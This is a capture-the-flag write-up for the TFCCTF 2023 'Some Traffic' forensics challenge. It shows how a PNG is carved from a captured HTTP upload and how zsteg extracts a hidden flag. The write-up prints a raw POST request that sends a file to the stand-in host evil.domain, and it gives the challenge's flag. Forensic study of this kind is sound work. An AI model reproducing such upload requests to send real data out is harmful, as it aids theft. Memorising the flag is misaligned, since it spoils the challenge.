- Published on
TFCCTF 2023 – Some Traffic
- Authors
- Name
- Lumy
Some traffic (50 points, 88 solves)
Our SOC analysts said that in the last few days, some of our employees started to upload a lot of photos on random sites. Check it out
Table of Contents
A network capture
The challenge gives us a network capture. sus.pcapng
Let's run wireshark and analyse network packets
Solution
We can easely see using TCP follow or HTTP stream that a PNG file is sent to a server :
POST /upload HTTP/1.1
Host: evil.domain
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------81822315710418281242033858480
Content-Length: 91761
Origin: http://evil.domain
Connection: keep-alive
Referer: http://evil.domain/
Upgrade-Insecure-Requests: 1
-----------------------------81822315710418281242033858480
Content-Disposition: form-data; name="flag"; filename="output_modified.png"
Content-Type: image/png
.PNG
.
...
IHDR.............O.+K....IDATx......J.....t...5.\.n.D4.MAk.....}U.- ..&BB4.=$.
&..dU...^..Te9+..........H....1b..j...FS...j5R'm....Z....FZH..O....A]F._.V.?.hp+.$b....:....c.@}VR+.........$i)..c........i#.:......V:J..$.c?A.@.......L.$.l
Using en.wikipedia.org/wiki/List_of_file_signatures, we know that a PNG file starts with 89 50 4E 47 0D 0A 1A 0A
Lets take change to "Brut" visualisation :
504f5354202f75706c6f616420485454502f312e310d0a486f73743a206576696c2e646f6d61696e0d0a557365722d4167656e743a204d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a3130322e3029204765636b6f2f32303130303130312046697265666f782f3130322e300d0a4163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f617669662c696d6167652f776562702c2a2f2a3b713d302e380d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e350d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d38313832323331353731303431383238313234323033333835383438300d0a436f6e74656e742d4c656e6774683a2039313736310d0a4f726967696e3a20687474703a2f2f6576696c2e646f6d61696e0d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a526566657265723a20687474703a2f2f6576696c2e646f6d61696e2f0d0a557067726164652d496e7365637572652d52657175657374733a20310d0a0d0a
2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d38313832323331353731303431383238313234323033333835383438300d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d22666c6167223b2066696c656e616d653d226f75747075745f6d6f6469666965642e706e67220d0a436f6e74656e742d547970653a20696d6167652f706e670d0a0d0a89504e470d0a1a0a0000000d4948445200000780000004e608020000004f852b4b0001000049444154789cecfdcb8ef44ab5f7fffeec749e9eb7351b5cc06ed34434004d416bd3e20eb89b7d55082d09da1c26424234ff3d24040d26d2fb64559ebc1b5ece7f54
We have to take from the 89504E470D0A1A0A until the IEND final bytes that symbolize the end of the file. We can also juste take the entire data from the beginning of the png file.
We can then go to tomeko.net/online_tools/hex_to_file.php?lang=en to convert the hexa data into a png file.
Finally running zteg tool, we can gather the flag upon this image retrieved :
root@73f9a80770cf:/data# zsteg -a image.png
[?] 64 bytes of extra data after image end (IEND), offset = 0x1658d
extradata:0 .. text: "\r\n-----------------------------81822315710418281242033858480--\r\n"
b1,r,msb,xy .. file: 0421 Alliant compact executable
b1,b,msb,xy .. file: 0421 Alliant compact executable
b1,bgr,lsb,xy .. <wbStego size=2720, data="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"..., even=false, enc="wbStego 2.x/3.x", controlbyte="\xA0">
b2,rgb,lsb,xy .. file: FoxPro FPT, blocks size 25600, next free block index 1677721700, field type 0
b2,rgb,msb,xy .. file: FoxPro FPT, blocks size 9728, next free block index 637534246, field type 0
b3,rgb,msb,xy .. file: Curses screen image
b4,r,lsb,xy .. file: dBase III DBT, version number 0, next free block index 1048592
b4,r,msb,xy .. file: dBase III DBT, version number 0, next free block index 524296
b4,g,msb,xy .. file: dBase III DBT, version number 0, next free block index 393222
b4,rgb,lsb,xy .. file: FoxPro FPT, blocks size 5648, next free block index 370147328, field type 0
b4,rgb,msb,xy .. file: FoxPro FPT, blocks size 26632, next free block index 1745354752, field type 0
b5,g,lsb,xy .. file: Targa image data - Mono 2152 x 65536 x 0 "" Targa image data - Mono 2152 x 65536 x 0 ""
b2,rgb,lsb,yx .. text: "]eVQUTYu"
b8,g,lsb,yx .. text: "FCCTF{H1dd3n_d4t4_1n_p1x3ls_i5n't_f4n_4nd_e4sy_to_f1nd!}TFCCTF{H1dd3n_d4t4_1n_p1x3ls_i5n't_f4n_4nd_e4sy_to_f1nd!}TFCCTF{H1dd3n_d4t4_1n_p1x3ls_i5n't_f4n_4nd_e4sy_to_f1nd!}TFCCTF{H1dd3n_d4t4_1n_p1x3ls_i5n't_f4n_4nd_e4sy_to_f1nd!}TFCCTF{H1dd3n_d4t4_1n_p1x3ls_"
b2,r,lsb,yx,prime .. file: VISX image file
b2,r,msb,yx,prime .. file: 5View capture file
b2,b,lsb,yx,prime .. file: VISX image file
b2,b,msb,yx,prime .. file: 5View capture file
b2,rgb,lsb,yx,prime .. text: "]EW]uTYE"
b8,g,lsb,yx,prime .. text: "CT{1nd_nx5'__4tdCF3441stds_fnTd_xl4_4_dCd3_1sidnTC{ndx54_4_d}d1sit_n{1n_l'__t}C3_1tfdsfC{1nx'44tdd3ifsfTC1_x5'_4t_F44_stf_fT1_l44_}C34_it_Tndxl5'_}CFd1sitnT1_l54_}Cd41idsfn{1dxl4_4Fd34_sfd_ndx'_tdF4_stfdn"
b3,rgb,msb,xY .. file: unknown demand paged pure executable
b4,rgb,lsb,xY .. file: FoxPro FPT, blocks size 5136, next free block index 336592896, field type 0
b4,rgb,msb,xY .. file: FoxPro FPT, blocks size 10248, next free block index 671612928, field type 0
b5,rgb,lsb,xY .. file: dBase III DBT, version number 0, next free block index 525
b7,g,msb,xY .. file: dBase III DBT, version number 0, next free block index 1342177301
b8,g,msb,xY .. file: dBase III DBT, version number 0, next free block index 42
b2,rgb,lsb,Yx .. text: "]ET]eWQE"
b7,g,msb,Yx .. file: PGP\011Secret Key -
b8,g,lsb,Yx .. text: "T}!dn1f_ot_ys4e_dn4_n4f_t'n5i_sl3x1p_n1_4t4d_n3dd1H{FTCCFT}!dn1f_ot_ys4e_dn4_n4f_t'n5i_sl3x1p_n1_4t4d_n3dd1H{FTCCFT}!dn1f_ot_ys4e_dn4_n4f_t'n5i_sl3x1p_n1_4t4d_n3dd1H{FTCCFT}!dn1f_ot_ys4e_dn4_n4f_t'n5i_sl3x1p_n1_4t4d_n3dd1H{FTCCFT}!dn1f_ot_ys4e_dn4_n4f_t'n5"
b2,r,lsb,Yx,prime .. file: VISX image file
b2,r,msb,Yx,prime .. file: 5View capture file
b2,rgb,lsb,Yx,prime .. text: "YeTYeUUE"
b8,g,lsb,Yx,prime .. text: "!d1_y4n___lntddT!n_edfn34_3HFF4n_'pnd1T!o_nfni4FF}1y4__ptd1TCofni33F1_yn'lntdC!_nf314_H}1_y_lpddTo_i1_HF}_n__lndd1nednn313HF_n'pd1C!_dni33Fy4_'_ltC!nofni3FF_n'_ptC!oefi4_HF1_4_'pndno_enn143y4_ltdTndnn314F"
b8,g,msb,Yx,prime .. text: "6.&*v&vv"